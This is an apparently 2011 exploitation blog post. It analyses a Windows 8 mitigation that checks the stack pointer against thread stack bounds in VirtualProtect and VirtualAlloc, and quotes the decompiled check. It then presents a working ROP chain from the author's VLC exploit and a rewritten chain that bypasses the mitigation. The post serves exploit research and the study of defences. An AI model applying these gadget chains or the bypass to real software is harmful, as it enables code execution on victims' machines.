Windows 8 introduced a number of exploit mitigation features, including hardening of both the userland and kernel heaps, mitigation against kernel-mode NULL pointer dereferences, and protection against abuse of virtual function pointer tables. One feature that stood out to me appears to be designed to help mitigate exploits leveraging return-oriented programming (ROP).
For those who don’t know, ROP is a generalization of the classic return-to-libc attack that involves leveraging small sequences of instructions, typically function epilogues, at known addresses to execute arbitrary code incrementally. This is achieved by controlling data pointed to by ESP, the stack pointer register, such that each ret
instruction results in incrementing ESP and transferring execution to the next address chosen by the attacker.
Because finding sequences of useful instructions (known as “gadgets”) may be difficult depending on the exploitation scenario, most real ROP exploits use an initial ROP stager to create a writable and executable memory segment that a second-stage traditional shellcode can be copied into. Most frequently, VirtualProtect
can be used to mark an existing executable segment writable, or VirtualAlloc
can be used to create a fresh segment. Other variations also exist.
A second trait common to many ROP exploits is that the ROP payload itself often doesn’t live in the thread’s stack, due to either the nature of the vulnerability itself or limits on the attacker’s ability to introduce code into portions of the vulnerable application’s address space. Instead, it’s much more common for a ROP payload to be positioned in the heap and pivot the stack pointer into the heap, at which point the ROP payload can run.
Microsoft has evidently been paying attention and noticed these two common factors. In an attempt to mitigate these types of exploits, Windows 8 implements a simple protection mechanism: every function associated with manipulating virtual memory, including the often-abused VirtualProtect
and VirtualAlloc
, now includes a check that the stack pointer, as contained in the trap frame, falls within the range defined by the Thread Environment Block (TEB). Code courtesy of Alex Ionescu:
char __cdecl PsValidateUserStack() { char Status; // al@1 _KTRAP_FRAME *TrapFrame; // ecx@3 _TEB *Teb; // ecx@3 void *.Eip; // [sp+10h] [bp-88h]@3 unsigned int .Esp; // [sp+14h] [bp-84h]@3 void *StackLimit; // [sp+18h] [bp-80h]@3 void *StackBase; // [sp+1Ch] [bp-7Ch]@3 _EXCEPTION_RECORD ExitStatus; // [sp+24h] [bp-74h]@6 CPPEH_RECORD ms_exc; // [sp+80h] [bp-18h]@3 CurrentThread = (_ETHREAD *)__readfsdword(0x124u); Status = LOBYTE(CurrentThread->Tcb.___u42.UserAffinity.Reserved[0]);// // PreviousMode == User if ( Status ) { __asm { bt dword ptr [edx+58h], 13h } // // KernelStackResident, ReadyTransition, Alertable Status = _CF; if ( _CF != 1 ) { TrapFrame = CurrentThread->Tcb.TrapFrame; .Esp = TrapFrame->HardwareEsp; .Eip = (void *)TrapFrame->Eip; Teb = (_TEB *)CurrentThread->Tcb.Teb; ms_exc.disabled = 0; StackLimit = Teb->DeallocationStack; StackBase = Teb->NtTib.StackBase; ms_exc.disabled = -2; Status = .Esp; if ( .Esp < (unsigned int)StackLimit || .Esp >= (unsigned int)StackBase ) { memset(&ExitStatus, 0, 0x50u); ExitStatus.ExceptionCode = STATUS_STACK_BUFFER_OVERRUN; ExitStatus.ExceptionAddress = .Eip; ExitStatus.NumberParameters = 2; ExitStatus.ExceptionInformation[0] = 4; ExitStatus.ExceptionInformation[1] = .Esp; Status = DbgkForwardException(&ExitStatus, 1, 1); if ( !Status ) { Status = DbgkForwardException(&ExitStatus, 0, 1); if ( !Status ) Status = ZwTerminateProcess((HANDLE)0xFFFFFFFF, ExitStatus.ExceptionCode); } } } } return Status; }
As a result, exploits that leverage a ROP payload stored in the heap cannot return into VirtualProtect
or VirtualAlloc
to create a writable and executable segment. While this provides yet another hurdle for exploit writers, it’s fairly easy to bypass. Besides writing a full ROP payload that doesn’t have a second stage, which may be difficult depending on the availability of gadgets, one simple way of avoiding this protection is to give it what it wants: ensure ESP points into the current thread’s stack whenever virtual memory functions are called. In the below example, I’ll assume the attacker has access to the original stack pointer through some register, as is the case when a pivot is performed using an xchg
instruction. If this isn’t the case, it may be worth investigating ways of finding the stack at runtime.
To demonstrate, let’s take the very basic ROP payload I used for a VLC exploit as an example. After triggering the vulnerability, I pivot the stack pointer into the heap using a gadget that executes the following:
xchg esi, esp retn
In this case, the ESI register contains a pointer to heap data I control, so by pivoting the stack pointer into this region, I can execute my first-stage ROP payload:
rop = [ rop_base + 0x1022, # retn # Call VirtualProtect() rop_base + 0x2c283, # pop eax; retn rop_base + 0x1212a4, # IAT entry for VirtualProtect -> eax rop_base + 0x12fda, # mov eax,DWORD PTR [eax] rop_base + 0x29d13, # jmp eax rop_base + 0x1022, # retn heap & ~0xfff, # lpAddress 0x60000, # dwSize 0x40, # flNewProtect heap - 0x1000, # lpfOldProtect # Enough of this ROP business... rop_base + 0xdace8 # push esp; retn ]
This payload pulls the address for VirtualProtect
from the Import Address Table (IAT), calls it to mark the heap executable, and jumps into the newly-executable heap to run a second-stage traditional shellcode.
Because ESP points into the heap at the time of the VirtualProtect
call, this exploit would fail due to the newly introduced mitigation in Windows 8. However, it’s relatively simple to adapt it to bypass this mitigation. Below is the updated ROP payload:
rop = [ rop_base + 0x1022, # retn # Write lpfOldProtect rop_base + 0x2c283, # pop eax; retn heap - 0x1000, # lpfOldProtect -> eax rop_base + 0x1db4f, # mov [esi],eax; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn # Write flNewProtect rop_base + 0x2c283, # pop eax; retn 0x40, # flNewProtect -> eax rop_base + 0x1db4f, # mov [esi],eax; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn # Write dwSize rop_base + 0x2c283, # pop eax; retn 0x60000, # dwSize -> eax rop_base + 0x1db4f, # mov [esi],eax; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn # Write lpAddress rop_base + 0x2c283, # pop eax; retn heap & ~0xfff, # lpAddress -> eax rop_base + 0x1db4f, # mov [esi],eax; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn # Write &Pivot rop_base + 0x2c283, # pop eax; retn rop_base + 0x229a5, # &pivot -> eax rop_base + 0x1db4f, # mov [esi],eax; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn rop_base + 0x3ab5e, # dec esi; retn # Write &VirtualProtect rop_base + 0x2c283, # pop eax; retn rop_base + 0x1212a4, # IAT entry for VirtualProtect -> eax rop_base + 0x12fda, # mov eax,DWORD PTR [eax] rop_base + 0x1db4f, # mov [esi],eax; retn # Pivot ESP rop_base + 0x229a5, # xchg esi,esp; retn; # Jump into shellcode rop_base + 0xdace8 # push esp; retn ]
This is a very crude example, but I think it demonstrates the idea just fine. I write the arguments to VirtualProtect
into the original stack, stored in the ESI register, one at a time. For the address that will be returned to coming out of VirtualProtect
, I place a pivot to move ESP back to the heap. Finally, to trigger the whole thing, I actually return into my pivot gadget, which will pivot ESP back to the original stack and return into VirtualProtect
.
In this case, adapting the exploit added an extra 124 bytes to the payload, but that was mostly due to the fact that I was limited on gadget availability and had to resort to decrementing ESI one value at a time. It’s probably possible to optimize this example with some extra work. In other cases, I’d expect it to be possible to implement this technique with much less overhead.
This entry was posted on Wednesday, September 21st, 2011 at 11:03 pm and is filed under Exploitation. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.